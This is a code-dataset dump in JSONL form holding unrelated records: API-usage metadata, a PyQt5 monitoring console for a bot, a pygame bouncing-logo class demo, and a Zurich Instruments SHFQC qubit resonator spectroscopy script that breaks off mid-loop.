"usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 573, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 574, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 581, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 582, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 589, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 608, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 610, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 611, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 618, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 622, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 595, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 653, "usage_type": "call"}, {"api_name": "tensorflow.unique", "line_number": 655, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 659, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 660, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 661, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 661, "usage_type": "attribute"}, {"api_name": "tensorflow.range", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 669, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 669, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 670, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 670, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 671, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 672, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 672, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 677, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 682, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 685, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.linspace", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 695, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.logical_and", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 702, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 704, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.boolean_mask", "line_number": 732, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 755, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental.numpy.diff", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental", "line_number": 759, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 764, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 765, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 767, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 768, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 770, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 776, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 786, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 786, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 788, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 788, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 790, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 790, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 792, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 792, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 800, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 815, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 816, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 821, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 826, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 827, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 828, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 781, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 863, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 863, "usage_type": "attribute"}, {"api_name": "tensorflow.io.decode_image", "line_number": 864, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 865, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 865, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 866, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 866, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 872, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 875, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 875, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 876, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 881, "usage_type": "call"}, {"api_name": "tensorflow.one_hot", "line_number": 882, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 883, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 883, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 884, "usage_type": "attribute"}]} +{"seq_id": "23674110279", "text": "'''\nCS 150 Introduction to OOP\n\nDemos a bouncing photo\n'''\nimport pygame\n\n# Specify the width and height of the screen for the game\nSCREEN_WIDTH = 1080\nSCREEN_HEIGHT = 720\n\n# Photo to display\nPHOTO = 'DVD.png' # 'red_logo.png'\n\n# Frames-Per-Second for game updates\nFPS = 60\n\nclass Box():\n def __init__(self):\n self.rect = pygame.Rect(0, 180, 320, 191)\n self.velocity = [200,200]\n img = pygame.image.load(PHOTO)\n self.image = pygame.transform.scale(img, self.rect.size)\n \n def update(self,dt):\n self.rect.x += self.velocity[0]*dt\n self.rect.y += self.velocity[1]*dt\n \n # Use the relevant attributes to check if rectangle has hit the edges\n # of the screen (0,0 is the upper left corner)\n if (self.rect.left < 0 or self.rect.right > SCREEN_WIDTH):\n self.velocity[0] *= -1\n if (self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT):\n self.velocity[1] *= -1\n \n def render(self, display):\n # Show the bouncing object at the current location\n display.blit(self.image, self.rect)\n\ndef play_game():\n # Initialize pygame\n pygame.init()\n pygame.font.init()\n\n # Initialize the screen\n screen = pygame.display.set_mode( (SCREEN_WIDTH,SCREEN_HEIGHT) )\n\n # Initialize game elements\n box = Box()\n\n # Initialize some game variables\n time = 0\n delta_t = 1/FPS\n\n # Setup the font and clock\n font = pygame.font.SysFont('Arial',14)\n clock = pygame.time.Clock()\n\n # Main game loop\n while True:\n \n # Get the event corresponding to user input\n event = pygame.event.poll()\n if event.type == pygame.QUIT:\n break\n\n # Draw the scene\n screen.fill((255,255,255)) # Fill the scene with white (specified by RGB tuple)\n\n box.update(delta_t) # Update the position of the box\n box.render(screen) # Show the bouncing object\n\n # Update and draw the current time in the bottom left corner\n time += delta_t\n text = font.render('Time=' + str(round(time,1)) + ' seconds',True,(0,0,0))\n screen.blit(text,(10,0.95*SCREEN_HEIGHT))\n\n # Update the screen\n pygame.display.update()\n clock.tick(FPS)\n\n pygame.quit()\n\n\n", "repo_name": "Norvoke/middcs150", "sub_path": "Week 11/logo_pygame.py", "file_name": "logo_pygame.py", "file_ext": "py", "file_size_in_byte": 2270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.Rect", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "72764017769", "text": "import io\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nimport dotenv\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom PyQt5 import QtGui, QtCore\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal, QObject\nfrom PyQt5.QtGui import QImage, QPixmap, QFontDatabase, QFont\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.uic import loadUi\n\nfrom requesters import GetRequester, PostRequester, Vars\nimport resources\n\nCHART_WIDTH = 320\n\n\nclass GetHandler(QObject):\n done = pyqtSignal(object)\n getter = GetRequester(os.environ.get('APPLICATION_URL'))\n\n def loop(self):\n while True:\n response = self.getter.response\n self.done.emit(response)\n\n time.sleep(0.3)\n\n\nclass PostHandler(QObject):\n done = pyqtSignal(object)\n poster = PostRequester(os.environ.get('APPLICATION_URL'))\n\n def post(self, instruction):\n res = self.poster.post(instruction)\n if not res.ok:\n pass\n\n self.done.emit(res.status_code)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n loadUi('main.ui', self)\n\n self._logger = logging.getLogger('index')\n self.pageList = ['homePage', 'logsPage']\n\n self.initUi()\n\n self._thread = QThread()\n\n self.get_handler = GetHandler()\n self.get_handler.done.connect(self.onRequestReady)\n\n self.post_handler = PostHandler()\n\n self.post_handler.moveToThread(self._thread)\n self.get_handler.moveToThread(self._thread)\n\n self._thread.started.connect(self.get_handler.loop)\n\n self.latency_log = [-2 for _ in range(10)]\n self.memory_usage_log = [-2 for _ in range(10)]\n\n self._thread.start()\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n self._logger.info('Closing MainWindow')\n super().closeEvent(event)\n self._logger.info('MainWindow has been successfully closed')\n\n def initUi(self):\n self._logger.info('Initializing MainWindow\\'s UI')\n\n # Navigation\n for i in ['home', 'logs']:\n eval(f'self.{i}').clicked.connect(self.onNavChecked)\n\n # Bot controls\n for i in ['launch', 'terminate', 'restart']:\n eval(f'self.{i}').clicked.connect(self.onControlBtnClick)\n\n # Window controls\n self.close_btn.clicked.connect(self.close)\n self.minimize_btn.clicked.connect(self.showMinimized)\n self.maximize_btn.clicked.connect(self.maximizeEvent)\n\n self.topBar.mouseMoveEvent = self.moveWindow\n\n # Other settings\n self.setWindowFlag(QtCore.Qt.WindowType.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WidgetAttribute.WA_TranslucentBackground)\n\n self._logger.info('Initialized UI, starting application...')\n\n def maximizeEvent(self):\n if self.isMaximized():\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: 1px transparent;\\n'\n 'border-radius: 20px;\\n'\n '}')\n self.maximize_btn.setToolTip('Maximize')\n self.showNormal()\n else:\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: none;\\n'\n '}')\n self.maximize_btn.setToolTip('Restore')\n self.showMaximized()\n\n def moveWindow(self, event):\n if event.buttons() == Qt.LeftButton:\n if self.isMaximized():\n self.maximizeEvent()\n\n self.move(self.pos() + event.globalPos() - self.dragPos)\n self.dragPos = event.globalPos()\n event.accept()\n\n def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:\n self.dragPos = event.globalPos()\n\n def onRequestReady(self, signal: dict):\n if signal is None:\n return\n\n self.updateLogs(signal)\n self.updateStatus(signal)\n self.updateVars(signal)\n\n def updateVars(self, signal: dict):\n vars_: Vars = signal['vars']\n data = json.loads(vars_.json())\n cpu, servers, memory = data.values()\n memory = float(memory[:-1])\n\n self.servers.setText(f'Servers: {servers}')\n self.title_mem.setText(f'Memory: {memory:.2f} MB')\n self.title_lat.setText(f'CPU: {cpu:.2f}%')\n\n del self.memory_usage_log[0]\n self.memory_usage_log.append(round(memory, 2))\n\n del self.latency_log[0]\n self.latency_log.append(round(cpu, 2))\n\n # Memory usage chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.memory_usage_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 512])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.memory.setPixmap(pixmap)\n\n # Latency changes chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.latency_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 0.5])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.latency.setPixmap(pixmap)\n\n @staticmethod\n def convertImage(im):\n im2 = im.convert('RGBA')\n data = im2.tobytes('raw', 'RGBA')\n qim = QImage(data, im.size[0], im.size[1], QImage.Format_ARGB32)\n pixmap = QPixmap.fromImage(qim)\n return pixmap\n\n def updateLogs(self, signal: dict):\n self.logger.setPlainText(signal['log'].content)\n self.logger.moveCursor(QtGui.QTextCursor.End)\n\n def updateStatus(self, signal: dict):\n self.status.setText(\n f'Bot status:\\n{signal[\"status\"]}'\n )\n\n def onControlBtnClick(self):\n instruction = self.sender().objectName()\n self.post_handler.post(instruction)\n\n def onNavChecked(self):\n page = self.sender().objectName() + 'Page'\n self.pages.setCurrentIndex(self.pageList.index(page))\n\n\ndef hook(*args):\n sys.__excepthook__(*args)\n\n\nif __name__ == '__main__':\n dotenv.load_dotenv('./.env')\n pyqt_plugins = 'venv/Lib/site-packages/PyQt5/Qt5/plugins/platforms'\n os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = pyqt_plugins\n\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(name)s:\\t%(message)s',\n datefmt='%y.%b.%Y %H:%M:%S')\n\n app = QApplication([])\n QFontDatabase.addApplicationFont('sources/fonts/Montserrat-Regular.ttf')\n window = MainWindow()\n sys.__excepthook__ = hook\n\n window.show()\n app.exec()\n\n del window, app\n", "repo_name": "l4blee/nosok-bot_console", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 7257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtCore.QObject", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 24, "usage_type": "call"}, {"api_name": "requesters.GetRequester", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QObject", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 36, "usage_type": "call"}, {"api_name": "requesters.PostRequester", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QCloseEvent", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 74, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 99, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.LeftButton", "line_number": 123, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 123, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 131, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 131, "usage_type": "name"}, {"api_name": "requesters.Vars", "line_number": 143, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 177, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 189, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 189, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_ARGB32", "line_number": 198, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 199, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 199, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QTextCursor", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 204, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 221, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 225, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 227, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 229, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 229, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 233, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase.addApplicationFont", "line_number": 234, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase", "line_number": 234, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 236, "usage_type": "attribute"}]} +{"seq_id": "27115300850", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 27 15:37:41 2022\n\n@author: zhinst\n\nRequirements:\n\n LabOne Version >= 22.02\n Instruments: 1 x SHFQC Instrument\n\n\"\"\"\n# In[1]\n\nfrom zhinst.toolkit import Session, SHFQAChannelMode\n\nsession = Session(\"localhost\")\ndevice = session.connect_device(\"DEV12131\")\n\n# In[2] Parameter\n\nnumber_of_qubits = 1\n\nqachannel_center_frequency = 6.4e9\nqachannel_power_in = -50\nqachannel_power_out = -30\n\nmax_amplitude_readout = 1 / number_of_qubits # * 0.98\n\n# Sweep Parameter\nqubit_readout_frequencies = [-1e6]\nqubit_readout_widths = [4e6]\nnumber_amplitude_values = 20\naverage_factor = 1e-6 # if set to 1, scales averages with amplitude\n\n# In[3] Device configuration\n\ndevice.qachannels[0].configure_channel(\n center_frequency=qachannel_center_frequency,\n input_range=qachannel_power_in,\n output_range=qachannel_power_out,\n mode=SHFQAChannelMode.SPECTROSCOPY,\n)\n\n# In[4] Sweeper configuration\n\n# initiates sweeper parameters\nsweeper = session.modules.shfqa_sweeper\nsweeper.device(device)\n\nsweeper.rf.center_freq(qachannel_center_frequency)\nsweeper.rf.input_range(qachannel_power_in)\nsweeper.rf.output_range(qachannel_power_out)\n\n# sweeper.sweep.start_freq(-700e6)\n# sweeper.sweep.stop_freq(700e6)\nsweeper.sweep.num_points(3001)\nsweeper.sweep.mapping(\"linear\")\nsweeper.sweep.oscillator_gain(max_amplitude_readout)\nsweeper.sweep.mode(True)\n\nsweeper.average.integration_time(1000e-6)\nsweeper.average.num_averages(1)\nsweeper.average.mode(\"cyclic\")\n\n# In[5] Measure each resonator with different powers\n\nimport sys\nimport os\nimport numpy as np\n\nresonator_spectrum_data = {\"qubits\": [[]] * number_of_qubits}\nrelative_amplitude_values = np.linspace(\n max_amplitude_readout / number_amplitude_values,\n max_amplitude_readout,\n number_amplitude_values,\n)\n\ndevice.qachannels[0].input.on(1)\ndevice.qachannels[0].output.on(1)\n\nprint(f\"sweep {number_of_qubits} qubits at {number_amplitude_values} amplitudes\")\n\nfor qubit in range(number_of_qubits):\n sweeper.sweep.start_freq(\n qubit_readout_frequencies[qubit] - qubit_readout_widths[qubit]\n )\n sweeper.sweep.stop_freq(\n qubit_readout_frequencies[qubit] + qubit_readout_widths[qubit]\n )\n\n for i, amplitude in enumerate(relative_amplitude_values):\n sweeper.sweep.oscillator_gain(amplitude)\n sweeper.average.num_averages(int(np.ceil(average_factor * 1 / amplitude ** 2)))\n print(\n f\"qubit: {qubit+1} amp: {amplitude:.5f} ({i+1}/{number_amplitude_values})\",\n end=\"\\r\",\n )\n old_stdout = sys.stdout # backup current stdout\n sys.stdout = open(os.devnull, \"w\")\n resonator_spectrum_data[\"qubits\"][qubit].append(sweeper.run())\n sys.stdout = old_stdout # reset old stdout\n\ndevice.qachannels[0].input.on(0)\ndevice.qachannels[0].output.on(0)\n\n# In[6] Plot the data for each qubit\n\n#resonator_spectrum_data['qubits'][0]==resonator_spectrum_data['qubits'][1]\n\nimport matplotlib.pyplot as plt\nfrom shfqc_helper import voltage_to_power_dBm\n\nfont_large=15\nfont_medium=10\n\nnum_points = sweeper.sweep.num_points()\n\nfor qubit in range(number_of_qubits):\n number_amplitude_values = 